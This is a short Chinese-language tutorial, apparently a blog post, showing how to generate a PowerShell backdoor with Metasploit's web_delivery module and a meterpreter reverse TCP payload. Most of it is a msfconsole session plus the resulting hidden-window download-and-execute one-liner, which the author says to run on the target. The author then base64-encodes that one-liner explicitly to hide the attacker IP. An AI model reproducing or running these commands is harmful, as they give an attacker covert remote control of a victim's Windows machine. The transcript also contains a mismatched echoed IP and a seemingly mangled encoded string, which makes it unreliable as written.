用metasploit来生成Powershell后门

在Kali的shell中配置一个Powershell后门，针对Windows的Powershell所设计。

Ref: www.arche.name/?p=252

root@kali:~# msfconsole
 
msf  >  use exploit/multi/script/web_delivery
msf exploit(web_delivery) >  set target 2
target => 2
msf exploit(web_delivery) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
 
msf exploit(web_delivery) > set lhost 192.168.4.95
lhost => 192.168.17.131
msf exploit(web_delivery) > set lport 9999
lport => 9999
msf exploit(web_delivery) > set srvport 8888
srvport => 8888
msf exploit(web_delivery) > set uripath /
uripath => /
 
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
 
[*] Started reverse TCP handler on 192.168.4.95:9999
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.4.95:8888/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://192.168.4.95:8888/');

第26行指出的Powershell命令就是所生成的木马回联一句话，在目标机上执行即可。

但是由于在这一句话中有明文的IP地址，很露骨。所以做个简单的编码工作。

root@ROPKA:~# echo "$l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://192.168.4.95:8888/')" >> ~/shellcode.txt
root@ROPKA:~# cat shellcode.txt | iconv --to-code UTF-16LE |base64
PQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AC4AcABy
AG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMA
dABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABp
AGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQA
ZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAuAGQAbwB3AG4AbABv
AGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANAAuADkA
NQA6ADgAOAA4ADgALwAnACkACgA=